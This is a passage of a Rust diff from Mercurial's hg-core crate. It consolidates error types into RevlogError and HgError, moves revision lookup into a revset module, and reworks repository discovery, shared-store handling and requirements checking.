-) -> Result<Vec<u8>, CatRevError> {
+ revset: &str,
+ files: &'a [HgPathBuf],
+) -> Result<CatOutput, RevlogError> {
+ let rev = crate::revset::resolve_single(revset, repo)?;
let changelog = Changelog::open(repo)?;
let manifest = Manifest::open(repo)?;
-
- let changelog_entry = match rev.parse::<Revision>() {
- Ok(rev) => changelog.get_rev(rev)?,
- _ => {
- let changelog_node = NodePrefix::from_hex(&rev)
- .map_err(|_| CatRevErrorKind::InvalidRevision)?;
- changelog.get_node(changelog_node.borrow())?
- }
- };
- let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?)
- .map_err(|_| CatRevErrorKind::CorruptedRevlog)?;
-
- let manifest_entry = manifest.get_node((&manifest_node).into())?;
+ let changelog_entry = changelog.get_rev(rev)?;
+ let node = *changelog
+ .node_from_rev(rev)
+ .expect("should succeed when changelog.get_rev did");
+ let manifest_node =
+ Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?;
+ let manifest_entry = manifest.get_node(manifest_node.into())?;
let mut bytes = vec![];
+ let mut matched = vec![false; files.len()];
+ let mut found_any = false;
for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() {
- for cat_file in files.iter() {
+ for (cat_file, is_matched) in files.iter().zip(&mut matched) {
if cat_file.as_bytes() == manifest_file.as_bytes() {
+ *is_matched = true;
+ found_any = true;
let index_path = store_path(manifest_file, b".i");
let data_path = store_path(manifest_file, b".d");
let file_log =
Revlog::open(repo, &index_path, Some(&data_path))?;
- let file_node = Node::from_hex(node_bytes)
- .map_err(|_| CatRevErrorKind::CorruptedRevlog)?;
- let file_rev = file_log.get_node_rev((&file_node).into())?;
+ let file_node = Node::from_hex_for_repo(node_bytes)?;
+ let file_rev = file_log.get_node_rev(file_node.into())?;
let data = file_log.get_rev_data(file_rev)?;
if data.starts_with(&METADATA_DELIMITER) {
let end_delimiter_position = data
@@ -125,7 +84,18 @@
}
}
- Ok(bytes)
+ let missing: Vec<_> = files
+ .iter()
+ .zip(&matched)
+ .filter(|pair| !*pair.1)
+ .map(|pair| pair.0.clone())
+ .collect();
+ Ok(CatOutput {
+ found_any,
+ concatenated: bytes,
+ missing,
+ node,
+ })
}
fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf {
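
For orientation, a hedged sketch of how a caller might drive the reworked `cat` (the `demo` function, the revset "0", and the file name are illustrative, not part of this series):

    use std::io::Write;

    use hg::operations::cat;
    use hg::repo::Repo;
    use hg::revlog::revlog::RevlogError;
    use hg::utils::hg_path::HgPath;

    fn demo(repo: &Repo) -> Result<(), RevlogError> {
        let files = vec![HgPath::new(b"README.rst").to_owned()];
        let output = cat(repo, "0", &files)?;
        if !output.missing.is_empty() {
            eprintln!("{} path(s) not in the manifest", output.missing.len());
        }
        // Matching file contents come back concatenated, in manifest order.
        std::io::stdout()
            .write_all(&output.concatenated)
            .expect("writing to stdout");
        Ok(())
    }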
--- a/rust/hg-core/src/operations/debugdata.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/debugdata.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,8 +7,6 @@
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefix;
-use crate::revlog::Revision;
/// Kind of data to debug
#[derive(Debug, Copy, Clone)]
@@ -17,86 +15,19 @@
Manifest,
}
-/// Kind of error encountered by DebugData
-#[derive(Debug)]
-pub enum DebugDataErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A DebugData error
-#[derive(Debug)]
-pub struct DebugDataError {
- /// Kind of error encountered by DebugData
- pub kind: DebugDataErrorKind,
-}
-
-impl From<DebugDataErrorKind> for DebugDataError {
- fn from(kind: DebugDataErrorKind) -> Self {
- DebugDataError { kind }
- }
-}
-
-impl From<std::io::Error> for DebugDataError {
- fn from(err: std::io::Error) -> Self {
- let kind = DebugDataErrorKind::IoError(err);
- DebugDataError { kind }
- }
-}
-
-impl From<RevlogError> for DebugDataError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => DebugDataErrorKind::IoError(err),
- RevlogError::UnsuportedVersion(version) => {
- DebugDataErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => {
- DebugDataErrorKind::InvalidRevision
- }
- RevlogError::AmbiguousPrefix => {
- DebugDataErrorKind::AmbiguousPrefix
- }
- RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog,
- RevlogError::UnknowDataFormat(format) => {
- DebugDataErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
/// Dump the contents data of a revision.
pub fn debug_data(
repo: &Repo,
- rev: &str,
+ revset: &str,
kind: DebugDataKind,
-) -> Result<Vec<u8>, DebugDataError> {
+) -> Result<Vec<u8>, RevlogError> {
let index_file = match kind {
DebugDataKind::Changelog => "00changelog.i",
DebugDataKind::Manifest => "00manifest.i",
};
let revlog = Revlog::open(repo, index_file, None)?;
-
- let data = match rev.parse::<Revision>() {
- Ok(rev) => revlog.get_rev_data(rev)?,
- _ => {
- let node = NodePrefix::from_hex(&rev)
- .map_err(|_| DebugDataErrorKind::InvalidRevision)?;
- let rev = revlog.get_node_rev(node.borrow())?;
- revlog.get_rev_data(rev)?
- }
- };
-
+ let rev =
+ crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?;
+ let data = revlog.get_rev_data(rev)?;
Ok(data)
}
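
A corresponding sketch for the simplified entry point; the call mirrors `rhg debugdata -c 0` and is illustrative only:

    use hg::operations::{debug_data, DebugDataKind};
    use hg::repo::Repo;
    use hg::revlog::revlog::RevlogError;

    fn demo(repo: &Repo) -> Result<Vec<u8>, RevlogError> {
        // Revision numbers and unambiguous hex prefixes are both accepted;
        // resolution now lives in `crate::revset`.
        debug_data(repo, "0", DebugDataKind::Changelog)
    }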
--- a/rust/hg-core/src/operations/dirstate_status.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/dirstate_status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -14,66 +14,6 @@
/// files.
pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>);
-#[cfg(feature = "dirstate-tree")]
-impl<'a, M: Matcher + Sync> Status<'a, M> {
- pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> {
- let (traversed_sender, traversed_receiver) =
- crossbeam_channel::unbounded();
-
- // Step 1: check the files explicitly mentioned by the user
- let (work, mut results) = self.walk_explicit(traversed_sender.clone());
-
- // Step 2: Check files in the dirstate
- if !self.matcher.is_exact() {
- self.extend_from_dmap(&mut results);
- }
- // Step 3: Check the working directory if listing unknowns
- if !work.is_empty() {
- // Hashmaps are quite a bit slower to build than vecs, so only
- // build it if needed.
- let mut old_results = None;
-
- // Step 2: recursively check the working directory for changes if
- // needed
- for (dir, dispatch) in work {
- match dispatch {
- Dispatch::Directory { was_file } => {
- if was_file {
- results.push((dir.to_owned(), Dispatch::Removed));
- }
- if self.options.list_ignored
- || self.options.list_unknown
- && !self.dir_ignore(&dir)
- {
- if old_results.is_none() {
- old_results =
- Some(results.iter().cloned().collect());
- }
- self.traverse(
- &dir,
- old_results
- .as_ref()
- .expect("old results should exist"),
- &mut results,
- traversed_sender.clone(),
- );
- }
- }
- _ => {
- unreachable!("There can only be directories in `work`")
- }
- }
- }
- }
-
- drop(traversed_sender);
- let traversed = traversed_receiver.into_iter().collect();
-
- Ok(build_response(results, traversed))
- }
-}
-
-#[cfg(not(feature = "dirstate-tree"))]
impl<'a, M: Matcher + Sync> Status<'a, M> {
pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> {
let (traversed_sender, traversed_receiver) =
--- a/rust/hg-core/src/operations/find_root.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,100 +0,0 @@
-use std::fmt;
-use std::path::{Path, PathBuf};
-
-/// Kind of error encoutered by FindRoot
-#[derive(Debug)]
-pub enum FindRootErrorKind {
- /// Root of the repository has not been found
- /// Contains the current directory used by FindRoot
- RootNotFound(PathBuf),
- /// The current directory does not exists or permissions are insufficient
- /// to get access to it
- GetCurrentDirError(std::io::Error),
-}
-
-/// A FindRoot error
-#[derive(Debug)]
-pub struct FindRootError {
- /// Kind of error encoutered by FindRoot
- pub kind: FindRootErrorKind,
-}
-
-impl std::error::Error for FindRootError {}
-
-impl fmt::Display for FindRootError {
- fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result {
- unimplemented!()
- }
-}
-
-/// Find the root of the repository
-/// by searching for a .hg directory in the process’ current directory and its
-/// ancestors
-pub fn find_root() -> Result<PathBuf, FindRootError> {
- let current_dir = std::env::current_dir().map_err(|e| FindRootError {
- kind: FindRootErrorKind::GetCurrentDirError(e),
- })?;
- Ok(find_root_from_path(&current_dir)?.into())
-}
-
-/// Find the root of the repository
-/// by searching for a .hg directory in the given directory and its ancestors
-pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> {
- if start.join(".hg").exists() {
- return Ok(start);
- }
- for ancestor in start.ancestors() {
- if ancestor.join(".hg").exists() {
- return Ok(ancestor);
- }
- }
- Err(FindRootError {
- kind: FindRootErrorKind::RootNotFound(start.into()),
- })
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use std::fs;
- use tempfile;
-
- #[test]
- fn dot_hg_not_found() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let path = tmp_dir.path();
-
- let err = find_root_from_path(&path).unwrap_err();
-
- // TODO do something better
- assert!(match err {
- FindRootError { kind } => match kind {
- FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(),
- _ => false,
- },
- })
- }
-
- #[test]
- fn dot_hg_in_current_path() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let root = tmp_dir.path();
- fs::create_dir_all(root.join(".hg")).unwrap();
-
- let result = find_root_from_path(&root).unwrap();
-
- assert_eq!(result, root)
- }
-
- #[test]
- fn dot_hg_in_parent() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let root = tmp_dir.path();
- fs::create_dir_all(root.join(".hg")).unwrap();
-
- let directory = root.join("some/nested/directory");
- let result = find_root_from_path(&directory).unwrap();
-
- assert_eq!(result, root)
- }
-} /* tests */
--- a/rust/hg-core/src/operations/list_tracked_files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/list_tracked_files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -6,47 +6,15 @@
// GNU General Public License version 2 or any later version.
use crate::dirstate::parsers::parse_dirstate;
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::changelog::Changelog;
use crate::revlog::manifest::{Manifest, ManifestEntry};
-use crate::revlog::node::{Node, NodePrefix};
+use crate::revlog::node::Node;
use crate::revlog::revlog::RevlogError;
-use crate::revlog::Revision;
use crate::utils::hg_path::HgPath;
-use crate::{DirstateParseError, EntryState};
+use crate::EntryState;
use rayon::prelude::*;
-use std::convert::From;
-
-/// Kind of error encountered by `ListDirstateTrackedFiles`
-#[derive(Debug)]
-pub enum ListDirstateTrackedFilesErrorKind {
- /// Error when reading the `dirstate` file
- IoError(std::io::Error),
- /// Error when parsing the `dirstate` file
- ParseError(DirstateParseError),
-}
-
-/// A `ListDirstateTrackedFiles` error
-#[derive(Debug)]
-pub struct ListDirstateTrackedFilesError {
- /// Kind of error encountered by `ListDirstateTrackedFiles`
- pub kind: ListDirstateTrackedFilesErrorKind,
-}
-
-impl From<ListDirstateTrackedFilesErrorKind>
- for ListDirstateTrackedFilesError
-{
- fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self {
- ListDirstateTrackedFilesError { kind }
- }
-}
-
-impl From<std::io::Error> for ListDirstateTrackedFilesError {
- fn from(err: std::io::Error) -> Self {
- let kind = ListDirstateTrackedFilesErrorKind::IoError(err);
- ListDirstateTrackedFilesError { kind }
- }
-}
/// List files under Mercurial control in the working directory
/// by reading the dirstate
@@ -56,16 +24,13 @@
}
impl Dirstate {
- pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> {
+ pub fn new(repo: &Repo) -> Result<Self, HgError> {
let content = repo.hg_vfs().read("dirstate")?;
Ok(Self { content })
}
- pub fn tracked_files(
- &self,
- ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> {
- let (_, entries, _) = parse_dirstate(&self.content)
- .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?;
+ pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> {
+ let (_, entries, _) = parse_dirstate(&self.content)?;
let mut files: Vec<&HgPath> = entries
.into_iter()
.filter_map(|(path, entry)| match entry.state {
@@ -78,81 +43,18 @@
}
}
-/// Kind of error encountered by `ListRevTrackedFiles`
-#[derive(Debug)]
-pub enum ListRevTrackedFilesErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A `ListRevTrackedFiles` error
-#[derive(Debug)]
-pub struct ListRevTrackedFilesError {
- /// Kind of error encountered by `ListRevTrackedFiles`
- pub kind: ListRevTrackedFilesErrorKind,
-}
-
-impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError {
- fn from(kind: ListRevTrackedFilesErrorKind) -> Self {
- ListRevTrackedFilesError { kind }
- }
-}
-
-impl From<RevlogError> for ListRevTrackedFilesError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => {
- ListRevTrackedFilesErrorKind::IoError(err)
- }
- RevlogError::UnsuportedVersion(version) => {
- ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => {
- ListRevTrackedFilesErrorKind::InvalidRevision
- }
- RevlogError::AmbiguousPrefix => {
- ListRevTrackedFilesErrorKind::AmbiguousPrefix
- }
- RevlogError::Corrupted => {
- ListRevTrackedFilesErrorKind::CorruptedRevlog
- }
- RevlogError::UnknowDataFormat(format) => {
- ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
/// List files under Mercurial control at a given revision.
pub fn list_rev_tracked_files(
repo: &Repo,
- rev: &str,
-) -> Result<FilesForRev, ListRevTrackedFilesError> {
+ revset: &str,
+) -> Result<FilesForRev, RevlogError> {
+ let rev = crate::revset::resolve_single(revset, repo)?;
let changelog = Changelog::open(repo)?;
let manifest = Manifest::open(repo)?;
-
- let changelog_entry = match rev.parse::<Revision>() {
- Ok(rev) => changelog.get_rev(rev)?,
- _ => {
- let changelog_node = NodePrefix::from_hex(&rev)
- .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?;
- changelog.get_node(changelog_node.borrow())?
- }
- };
- let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?)
- .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?;
- let manifest_entry = manifest.get_node((&manifest_node).into())?;
+ let changelog_entry = changelog.get_rev(rev)?;
+ let manifest_node =
+ Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?;
+ let manifest_entry = manifest.get_node(manifest_node.into())?;
Ok(FilesForRev(manifest_entry))
}
--- a/rust/hg-core/src/operations/mod.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/mod.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,19 +5,8 @@
mod cat;
mod debugdata;
mod dirstate_status;
-mod find_root;
mod list_tracked_files;
-pub use cat::{cat, CatRevError, CatRevErrorKind};
-pub use debugdata::{
- debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind,
-};
-pub use find_root::{
- find_root, find_root_from_path, FindRootError, FindRootErrorKind,
-};
-pub use list_tracked_files::{
- list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError,
- ListRevTrackedFilesErrorKind,
-};
-pub use list_tracked_files::{
- Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind,
-};
+pub use cat::{cat, CatOutput};
+pub use debugdata::{debug_data, DebugDataKind};
+pub use list_tracked_files::Dirstate;
+pub use list_tracked_files::{list_rev_tracked_files, FilesForRev};
--- a/rust/hg-core/src/repo.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/repo.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,10 @@
-use crate::operations::{find_root, FindRootError};
+use crate::config::{Config, ConfigError, ConfigParseError};
+use crate::errors::{HgError, IoErrorContext, IoResultExt};
use crate::requirements;
+use crate::utils::files::get_path_from_bytes;
+use crate::utils::SliceExt;
use memmap::{Mmap, MmapOptions};
+use std::collections::HashSet;
use std::path::{Path, PathBuf};
/// A repository on disk
@@ -8,85 +12,255 @@
working_directory: PathBuf,
dot_hg: PathBuf,
store: PathBuf,
+ requirements: HashSet<String>,
+ config: Config,
+}
+
+#[derive(Debug, derive_more::From)]
+pub enum RepoError {
+ NotFound {
+ at: PathBuf,
+ },
+ #[from]
+ ConfigParseError(ConfigParseError),
+ #[from]
+ Other(HgError),
+}
+
+impl From<ConfigError> for RepoError {
+ fn from(error: ConfigError) -> Self {
+ match error {
+ ConfigError::Parse(error) => error.into(),
+ ConfigError::Other(error) => error.into(),
+ }
+ }
}
/// Filesystem access abstraction for the contents of a given "base" directory
#[derive(Clone, Copy)]
-pub(crate) struct Vfs<'a> {
- base: &'a Path,
+pub struct Vfs<'a> {
+ pub(crate) base: &'a Path,
}
impl Repo {
- /// Returns `None` if the given path doesn’t look like a repository
- /// (doesn’t contain a `.hg` sub-directory).
- pub fn for_path(root: impl Into<PathBuf>) -> Self {
- let working_directory = root.into();
- let dot_hg = working_directory.join(".hg");
- Self {
- store: dot_hg.join("store"),
- dot_hg,
- working_directory,
+ /// Find a repository, either at the given path (which must contain a `.hg`
+ /// sub-directory) or by searching the current directory and its
+ /// ancestors.
+ ///
+ /// A method with two very different "modes" like this is usually a code
+ /// smell that suggests two separate methods, but in this case an `Option`
+ /// is what rhg sub-commands get from Clap for the `-R` / `--repository`
+ /// CLI argument. Having two methods would just move that `if` to almost
+ /// all callers.
+ pub fn find(
+ config: &Config,
+ explicit_path: Option<&Path>,
+ ) -> Result<Self, RepoError> {
+ if let Some(root) = explicit_path {
+ if root.join(".hg").is_dir() {
+ Self::new_at_path(root.to_owned(), config)
+ } else if root.is_file() {
+ Err(HgError::unsupported("bundle repository").into())
+ } else {
+ Err(RepoError::NotFound {
+ at: root.to_owned(),
+ })
+ }
+ } else {
+ let current_directory = crate::utils::current_dir()?;
+ // ancestors() is inclusive: it first yields `current_directory`
+ // as-is.
+ for ancestor in current_directory.ancestors() {
+ if ancestor.join(".hg").is_dir() {
+ return Self::new_at_path(ancestor.to_owned(), config);
+ }
+ }
+ Err(RepoError::NotFound {
+ at: current_directory,
+ })
}
}
- pub fn find() -> Result<Self, FindRootError> {
- find_root().map(Self::for_path)
- }
+ /// To be called after checking that `.hg` is a sub-directory
+ fn new_at_path(
+ working_directory: PathBuf,
+ config: &Config,
+ ) -> Result<Self, RepoError> {
+ let dot_hg = working_directory.join(".hg");
+
+ let mut repo_config_files = Vec::new();
+ repo_config_files.push(dot_hg.join("hgrc"));
+ repo_config_files.push(dot_hg.join("hgrc-not-shared"));
+
+ let hg_vfs = Vfs { base: &dot_hg };
+ let mut reqs = requirements::load_if_exists(hg_vfs)?;
+ let relative =
+ reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT);
+ let shared =
+ reqs.contains(requirements::SHARED_REQUIREMENT) || relative;
+
+ // From `mercurial/localrepo.py`:
+ //
+ // if .hg/requires contains the sharesafe requirement, it means
+ // there exists a `.hg/store/requires` too and we should read it
+ // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement
+ // is present. We never write SHARESAFE_REQUIREMENT for a repo if store
+ // is not present, refer checkrequirementscompat() for that
+ //
+ // However, if SHARESAFE_REQUIREMENT is not present, it means that the
+ // repository was shared the old way. We check the share source
+ // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the
+ // current repository needs to be reshared
+ let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT);
+
+ let store_path;
+ if !shared {
+ store_path = dot_hg.join("store");
+ } else {
+ let bytes = hg_vfs.read("sharedpath")?;
+ let mut shared_path =
+ get_path_from_bytes(bytes.trim_end_newlines()).to_owned();
+ if relative {
+ shared_path = dot_hg.join(shared_path)
+ }
+ if !shared_path.is_dir() {
+ return Err(HgError::corrupted(format!(
+ ".hg/sharedpath points to nonexistent directory {}",
+ shared_path.display()
+ ))
+ .into());
+ }
+
+ store_path = shared_path.join("store");
- pub fn check_requirements(
- &self,
- ) -> Result<(), requirements::RequirementsError> {
- requirements::check(self)
+ let source_is_share_safe =
+ requirements::load(Vfs { base: &shared_path })?
+ .contains(requirements::SHARESAFE_REQUIREMENT);
+
+ if share_safe && !source_is_share_safe {
+ return Err(match config
+ .get(b"share", b"safe-mismatch.source-not-safe")
+ {
+ Some(b"abort") | None => HgError::abort(
+ "abort: share source does not support share-safe requirement\n\
+ (see `hg help config.format.use-share-safe` for more information)",
+ ),
+ _ => HgError::unsupported("share-safe downgrade"),
+ }
+ .into());
+ } else if source_is_share_safe && !share_safe {
+ return Err(
+ match config.get(b"share", b"safe-mismatch.source-safe") {
+ Some(b"abort") | None => HgError::abort(
+ "abort: version mismatch: source uses share-safe \
+ functionality while the current share does not\n\
+ (see `hg help config.format.use-share-safe` for more information)",
+ ),
+ _ => HgError::unsupported("share-safe upgrade"),
+ }
+ .into(),
+ );
+ }
+
+ if share_safe {
+ repo_config_files.insert(0, shared_path.join("hgrc"))
+ }
+ }
+ if share_safe {
+ reqs.extend(requirements::load(Vfs { base: &store_path })?);
+ }
+
+ let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() {
+ config.combine_with_repo(&repo_config_files)?
+ } else {
+ config.clone()
+ };
+
+ let repo = Self {
+ requirements: reqs,
+ working_directory,
+ store: store_path,
+ dot_hg,
+ config: repo_config,
+ };
+
+ requirements::check(&repo)?;
+
+ Ok(repo)
}
pub fn working_directory_path(&self) -> &Path {
&self.working_directory
}
+ pub fn requirements(&self) -> &HashSet<String> {
+ &self.requirements
+ }
+
+ pub fn config(&self) -> &Config {
+ &self.config
+ }
+
/// For accessing repository files (in `.hg`), except for the store
/// (`.hg/store`).
- pub(crate) fn hg_vfs(&self) -> Vfs<'_> {
+ pub fn hg_vfs(&self) -> Vfs<'_> {
Vfs { base: &self.dot_hg }
}
/// For accessing repository store files (in `.hg/store`)
- pub(crate) fn store_vfs(&self) -> Vfs<'_> {
+ pub fn store_vfs(&self) -> Vfs<'_> {
Vfs { base: &self.store }
}
/// For accessing the working copy
-
- // The undescore prefix silences the "never used" warning. Remove before
- // using.
- pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> {
+ pub fn working_directory_vfs(&self) -> Vfs<'_> {
Vfs {
base: &self.working_directory,
}
}
+
+ pub fn dirstate_parents(
+ &self,
+ ) -> Result<crate::dirstate::DirstateParents, HgError> {
+ let dirstate = self.hg_vfs().mmap_open("dirstate")?;
+ let parents =
+ crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?;
+ Ok(parents.clone())
+ }
}
impl Vfs<'_> {
- pub(crate) fn read(
+ pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf {
+ self.base.join(relative_path)
+ }
+
+ pub fn read(
&self,
relative_path: impl AsRef<Path>,
- ) -> std::io::Result<Vec<u8>> {
- std::fs::read(self.base.join(relative_path))
+ ) -> Result<Vec<u8>, HgError> {
+ let path = self.join(relative_path);
+ std::fs::read(&path).when_reading_file(&path)
}
- pub(crate) fn open(
+ pub fn mmap_open(
&self,
relative_path: impl AsRef<Path>,
- ) -> std::io::Result<std::fs::File> {
- std::fs::File::open(self.base.join(relative_path))
+ ) -> Result<Mmap, HgError> {
+ let path = self.base.join(relative_path);
+ let file = std::fs::File::open(&path).when_reading_file(&path)?;
+ // TODO: what are the safety requirements here?
+ let mmap = unsafe { MmapOptions::new().map(&file) }
+ .when_reading_file(&path)?;
+ Ok(mmap)
}
- pub(crate) fn mmap_open(
+ pub fn rename(
&self,
- relative_path: impl AsRef<Path>,
- ) -> std::io::Result<Mmap> {
- let file = self.open(relative_path)?;
- // TODO: what are the safety requirements here?
- let mmap = unsafe { MmapOptions::new().map(&file) }?;
- Ok(mmap)
+ relative_from: impl AsRef<Path>,
+ relative_to: impl AsRef<Path>,
+ ) -> Result<(), HgError> {
+ let from = self.join(relative_from);
+ let to = self.join(relative_to);
+ std::fs::rename(&from, &to)
+ .with_context(|| IoErrorContext::RenamingFile { from, to })
}
}
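
A hedged sketch of the new open path from a caller's perspective; `Config::load` stands in for however the CLI builds its configuration and is an assumption, not an API shown in this hunk:

    use std::path::Path;

    use hg::config::Config;
    use hg::repo::{Repo, RepoError};

    fn open_repo(explicit: Option<&Path>) -> Result<Repo, RepoError> {
        // Hypothetical constructor; a `ConfigError` converts into
        // `RepoError` through the `From` impl above.
        let config = Config::load(Vec::new())?;
        // `None` triggers the ancestor search from the current directory.
        let repo = Repo::find(&config, explicit)?;
        // Requirements are now loaded once and cached on the `Repo`.
        assert!(repo.requirements().contains("revlogv1"));
        Ok(repo)
    }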
--- a/rust/hg-core/src/requirements.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/requirements.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,19 +1,9 @@
-use crate::repo::Repo;
-use std::io;
+use crate::errors::{HgError, HgResultExt};
+use crate::repo::{Repo, Vfs};
+use crate::utils::join_display;
+use std::collections::HashSet;
-#[derive(Debug)]
-pub enum RequirementsError {
- // TODO: include a path?
- Io(io::Error),
- /// The `requires` file is corrupted
- Corrupted,
- /// The repository requires a feature that we don't support
- Unsupported {
- feature: String,
- },
-}
-
-fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> {
+fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> {
// The Python code reading this file uses `str.splitlines`
// which looks for a number of line separators (even including a couple of
// non-ASCII ones), but Python code writing it always uses `\n`.
@@ -27,16 +17,20 @@
if line[0].is_ascii_alphanumeric() && line.is_ascii() {
Ok(String::from_utf8(line.into()).unwrap())
} else {
- Err(())
+ Err(HgError::corrupted("parse error in 'requires' file"))
}
})
.collect()
}
-pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> {
- match repo.hg_vfs().read("requires") {
- Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted),
+pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> {
+ parse(&hg_vfs.read("requires")?)
+}
+pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> {
+ if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? {
+ parse(&bytes)
+ } else {
// Treat a missing file the same as an empty file.
// From `mercurial/localrepo.py`:
// > requires file contains a newline-delimited list of
@@ -44,33 +38,121 @@
// > the repository. This file was introduced in Mercurial 0.9.2,
// > which means very old repositories may not have one. We assume
// > a missing file translates to no requirements.
- Err(error) if error.kind() == std::io::ErrorKind::NotFound => {
- Ok(Vec::new())
- }
-
- Err(error) => Err(RequirementsError::Io(error))?,
+ Ok(HashSet::new())
}
}
-pub fn check(repo: &Repo) -> Result<(), RequirementsError> {
- for feature in load(repo)? {
- if !SUPPORTED.contains(&&*feature) {
- return Err(RequirementsError::Unsupported { feature });
- }
+pub(crate) fn check(repo: &Repo) -> Result<(), HgError> {
+ let unknown: Vec<_> = repo
+ .requirements()
+ .iter()
+ .map(String::as_str)
+ // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str()))
+ .filter(|feature| {
+ !REQUIRED.contains(feature) && !SUPPORTED.contains(feature)
+ })
+ .collect();
+ if !unknown.is_empty() {
+ return Err(HgError::unsupported(format!(
+ "repository requires feature unknown to this Mercurial: {}",
+ join_display(&unknown, ", ")
+ )));
+ }
+ let missing: Vec<_> = REQUIRED
+ .iter()
+ .filter(|&&feature| !repo.requirements().contains(feature))
+ .collect();
+ if !missing.is_empty() {
+ return Err(HgError::unsupported(format!(
+ "repository is missing feature required by this Mercurial: {}",
+ join_display(&missing, ", ")
+ )));
}
Ok(())
}
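
An illustrative test of the parser's contract (an assumption, not part of the patch), relying on the split-on-`\n` behavior described in the comment above:

    #[test]
    fn parse_requires_sketch() {
        let reqs = parse(b"dotencode\nfncache\nrevlogv1\nstore\n").unwrap();
        assert!(reqs.contains("revlogv1"));
        assert!(reqs.contains("store"));
        // A line that is not ASCII, or does not start with an ASCII
        // alphanumeric byte, is reported as corruption.
        assert!(parse(b"\xffbad\n").is_err());
    }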
-// TODO: set this to actually-supported features
+/// rhg does not support repositories that are *missing* any of these features
+const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"];
+
+/// rhg supports repositories with or without these
const SUPPORTED: &[&str] = &[
- "dotencode",
- "fncache",
"generaldelta",
- "revlogv1",
- "sparserevlog",
- "store",
+ SHARED_REQUIREMENT,
+ SHARESAFE_REQUIREMENT,
+ SPARSEREVLOG_REQUIREMENT,
+ RELATIVE_SHARED_REQUIREMENT,
+ REVLOG_COMPRESSION_ZSTD,
